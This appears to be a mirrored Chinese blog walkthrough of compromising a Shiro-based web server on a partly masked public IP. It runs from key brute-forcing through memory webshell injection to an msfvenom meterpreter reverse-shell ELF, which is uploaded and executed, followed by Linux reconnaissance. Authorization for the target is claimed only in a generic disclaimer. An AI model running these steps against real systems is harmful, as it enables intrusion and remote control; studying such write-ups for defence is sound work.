8

记一次实战 Shiro反序列化内网上线 - Web_Kio

 2 years ago
source link: https://www.cnblogs.com/Webkio/p/16482980.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Shiro反序列化内网上线


说明:
此贴仅分享用于各安全人员进行安全学习提供思路,或有合法授权的安全测试,请勿参考用于其他用途,如有,后果自负。
感谢各位大佬的关注

目标:152.xxx.xxx.xxx
目的:通过信息收集或其他方式寻找到了一枚shiro反序列化的漏洞,并进行了内网渗透测试工作
类型:Web反序列化漏洞

介绍:
Shiro 是 Java安全框架通过序列化,进行AES密钥做身份验证加密(cookie加密)通过shiro硬编码 比证密钥 获取目标利用链并进行上线操作

1657889058879-5a8b6e44-cbd2-4641-bd63-44049b855b8c.png#clientId=u3b1529ff-2511-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=165&id=u1a1f8676&margin=%5Bobject%20Object%5D&name=image.png&originHeight=206&originWidth=746&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46275&status=done&style=none&taskId=u67250c78-4816-4eb3-a7f0-dc5d798ad53&title=&width=596.8


本文的起因是在一次渗透测试中,挖掘到了一个shiro反序列化 故进行了内网渗透尝试

特征:
在请求消息中 构造cookie
添加一个参数rememberMe=xxx,观察响应消息头中的Set-Cookie是否有rememberMe=deleteMe;如果有则说明使用了shiro框架

1657891009475-a2e849b0-e812-4b0c-bdbe-7120910f3f58.png#clientId=uaf71bc80-23d1-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=304&id=u919d6b48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=380&originWidth=1159&originalType=binary&ratio=1&rotation=0&showTitle=false&size=272235&status=done&style=none&taskId=ue5effb30-565d-4e58-a48d-b0e5fde124b&title=&width=927.2

这里我采用的是网络空间测绘引擎、目录信息收集、域名收集 等进行了资产整合利用

将搜集的信息 导出整合数据 备用

2902742-20220715222552717-119495901.png
  1. 利用检测工具 减少误判率

这里我用的是java开发的shiroScan 检测工具
*扫之前记得开代理 查询当前代理IP

1657884019825-36d60959-a459-4174-9591-b3761636b5d6.png#clientId=u9d6f330f-d99a-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=689&id=uf6916be2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=861&originWidth=1731&originalType=binary&ratio=1&rotation=0&showTitle=false&size=201688&status=done&style=none&taskId=u27c03489-e95b-47cb-84cc-2be09b261e2&title=&width=1384.8

在当前目录下开始对目标进行扫描 再次筛选存活并可利用的网站

1657889399707-3557b743-4b0f-4a36-a6d5-bc10b2272b27.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=542&id=u26d61d48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=677&originWidth=1520&originalType=binary&ratio=1&rotation=0&showTitle=false&size=391007&status=done&style=none&taskId=ua821a0bd-d65f-4c20-b5d4-14994c0c2d4&title=&width=1216

将筛选结果导出保存

1657889446893-d72762c4-d3c0-4e77-a0a0-f062d5299591.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=665&id=u741f2cdd&margin=%5Bobject%20Object%5D&name=image.png&originHeight=831&originWidth=1266&originalType=binary&ratio=1&rotation=0&showTitle=false&size=269374&status=done&style=none&taskId=ua3f7d497-2e96-4fe7-850d-443c7a082c7&title=&width=1012.8

  1. 这边我利用shiro利用工具对目标进行”硬编码“ 密钥爆破操作

这里我用的是java开发的shiro利用工具
筛选目标时 发现目标存在Shiro反序列化漏洞 采用了硬编码

1657890070094-933efb87-b094-4cfa-b86b-2b9867337939.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=138&id=u24881d82&margin=%5Bobject%20Object%5D&name=image.png&originHeight=172&originWidth=835&originalType=binary&ratio=1&rotation=0&showTitle=false&size=60401&status=done&style=none&taskId=u8ce33b0f-edf3-4432-8875-09a6fdaa8c1&title=&width=668


在工具内进行功能区的利用,在爆破完成后,对目标进行目录扫描。【记得开代理】
kali中 开个小代理

1657885376473-fe9035cf-dd87-45b9-8a30-afd8f1f49cc8.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=576&id=u623f219b&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=295068&status=done&style=none&taskId=u0d2c91a6-93cf-4475-8fe9-3d5a39c28e0&title=&width=1024


2.这边对目标进行目录收集

1657885447715-21490279-9b91-4e5c-bfba-d4071a981bb4.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0.7111&crop=1&crop=1&from=paste&height=251&id=ufa26ed84&margin=%5Bobject%20Object%5D&name=image.png&originHeight=314&originWidth=1118&originalType=binary&ratio=1&rotation=0&showTitle=false&size=99353&status=done&style=none&taskId=u8148cece-d9f8-4907-8432-08ad9e0651d&title=&width=894


3.这边当即对 目标目录 进行内存马注入操作
拓展一下:
内存马 是无文件渗透测试的一种常用手段
webshell的变迁过程大致如下所述:
web服务器管理页面——> 大马——>小马拉大马——>一句话木马——>加密一句话木马——>加密内存马
因为传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,故内存马使用越来越多

1657890408105-eb624b72-46e6-4fa8-93b0-28df097650bc.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=222&id=udef18496&margin=%5Bobject%20Object%5D&name=image.png&originHeight=278&originWidth=1255&originalType=binary&ratio=1&rotation=0&showTitle=false&size=26900&status=done&style=none&taskId=u99fe004f-5839-4bc4-88a5-215c1daaed8&title=&width=1004


这边我使用 蚁剑 尝试连接成功

1657890440474-5921ff09-572e-4cd7-8478-1434d6a79f9c.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=649&id=ucfafaefb&margin=%5Bobject%20Object%5D&name=image.png&originHeight=811&originWidth=1193&originalType=binary&ratio=1&rotation=0&showTitle=false&size=134970&status=done&style=none&taskId=ue3cd8a92-00cc-48ac-8cf7-ceaebb03dff&title=&width=954.4


蚁剑的命令行中执行 查询命令时 发现该目标是root用户 Linux系统 初步判断是Debian

1657886275836-a97c14d9-9776-4f01-aab1-c87cdd6971f4.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=93&id=u36c9bbec&margin=%5Bobject%20Object%5D&name=image.png&originHeight=116&originWidth=996&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12363&status=done&style=none&taskId=u523457be-1599-40ea-a4f3-ab7c5cf60e6&title=&width=796.8

这里开始利用 metasploit 安全漏洞检测工具中的_msfvenom payload生成器 _使目标上线

msfvenom生成 Linux 后门程序,这里刚开始我是使用的cobalt strike 中生成的Java后门程序发现行不通 可能是因为目标JDK的版本 导致不兼容的原因,故利用metasploit的msfvenom生成后门程序 结合“蚁剑”上传后门程序 使目标成功进行执行上线操作

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=[lhost_ip] lport=22715 -f elf -o 123.elf

1657890569118-c6653c53-836b-4296-8578-b7cd8a818a85.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=304&id=ue3f48ee2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=380&originWidth=1392&originalType=binary&ratio=1&rotation=0&showTitle=false&size=137524&status=done&style=none&taskId=ub5784c8c-1364-4652-8494-6cd58336fdc&title=&width=1113.6


将生成的后门程序 上传至目标 并利用蚁剑的命令行执行此文件 记得改文件执行权限
chmod 777 123.elf;
chmod u+x 123.elf;
./123.elf 执行文件

1657890745532-c40c8523-8f5d-43bc-acf6-63d36c63aa6e.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=514&id=u8e2e78ee&margin=%5Bobject%20Object%5D&name=image.png&originHeight=643&originWidth=1580&originalType=binary&ratio=1&rotation=0&showTitle=false&size=191739&status=done&style=none&taskId=u394d07ab-acf0-4b6c-b5c0-7ed936f207f&title=&width=1264


后门程序“123.elf” 成功上传至目标/bin目录下

执行msfconsole 进入MSF命令接口 执行快速监听等待目标成功上线

1657890710595-5bf18bc9-ea20-4dc4-a1ce-59d60898cb5c.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=388&id=u6a25344e&margin=%5Bobject%20Object%5D&name=image.png&originHeight=485&originWidth=1303&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141975&status=done&style=none&taskId=u729b624b-1409-4a55-ab62-dde428e27c8&title=&width=1042.4


利用meterpreter成功拿shell
它是攻击载荷能够获得目标系统的一个Meterpreter shell的链接

1657886446619-22f5dc6e-2180-4c6d-a1e0-f2dd88c441d9.png#clientId=u8f720aeb-a6e3-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=446&id=u2a9bb074&margin=%5Bobject%20Object%5D&name=image.png&originHeight=558&originWidth=1110&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50605&status=done&style=none&taskId=u7e06df76-12dc-4251-8660-b65004c750e&title=&width=888

内网渗透 Linux信息收集

查询主机名

2>/dev/null,作用是丢弃错误信息
hostname 2>/dev/null

1657890799651-cee38c5a-3461-4831-9c4e-9ea2ef1de8df.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=144&id=u012959cb&margin=%5Bobject%20Object%5D&name=image.png&originHeight=180&originWidth=556&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27608&status=done&style=none&taskId=uf0be1324-6a97-4b59-8f5d-5b9fe5badc4&title=&width=444.8

查询系统名称

cat /etc/issue

查询内核版本

查询系统和内核的所有相关信息
依次为内核名称,主机名,内核版本号,内核版本,硬件架构名称,处理器类型,硬件平台类型,操作系统名称
uname -a
1657890817705-8e255581-fb1f-440a-9d57-64f133fba70a.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=55&id=u1bc4b2a2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=69&originWidth=1170&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27226&status=done&style=none&taskId=u923166cb-5ab8-4c41-9a14-30f04244a35&title=&width=936

查询CPU信息

cat /proc/cpuinfo

1657887334220-35df6936-c7f1-4808-9412-9397bf2ca9f0.png#clientId=u9650ef87-b70d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=187&id=u8f644322&margin=%5Bobject%20Object%5D&name=image.png&originHeight=234&originWidth=668&originalType=binary&ratio=1&rotation=0&showTitle=false&size=16575&status=done&style=none&taskId=u49417e4e-8158-4444-94cb-6d9af1d82d3&title=&width=534.4

查询磁盘信息

查询文件系统磁盘的详细信息
包括磁盘名称,内存大小,已用空间,可用空间,挂载点
查看本地磁盘信息
df -lh
查看所有磁盘信息
df -ah

1657887500845-788aaf6d-1817-407c-859a-b873b4c71f24.png#clientId=u9650ef87-b70d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=173&id=uf8ad2964&margin=%5Bobject%20Object%5D&name=image.png&originHeight=216&originWidth=719&originalType=binary&ratio=1&rotation=0&showTitle=false&size=26330&status=done&style=none&taskId=uf4bddca0-60b5-4ce7-9f66-c8b99aff6b4&title=&width=575.2

查询网络连接状态

访问网络连接状态及其相关信息的程序

1657890853386-9ad92a2e-daa0-4245-b5c4-f09b82a21278.png#clientId=ud865159c-2323-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=196&id=u089b3cad&margin=%5Bobject%20Object%5D&name=image.png&originHeight=245&originWidth=1179&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103112&status=done&style=none&taskId=u5841fccf-ea48-4379-ae51-cb1b847c3e7&title=&width=943.2


这里可以看到在目标执行中的"123.elf"后门程序

点到为止 测试结束

__EOF__

本文作者: -Kio- 本文链接: https://www.cnblogs.com/Webkio/p/16482980.html 关于博主: 评论和私信会在第一时间回复。或者直接私信我。 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处! 声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK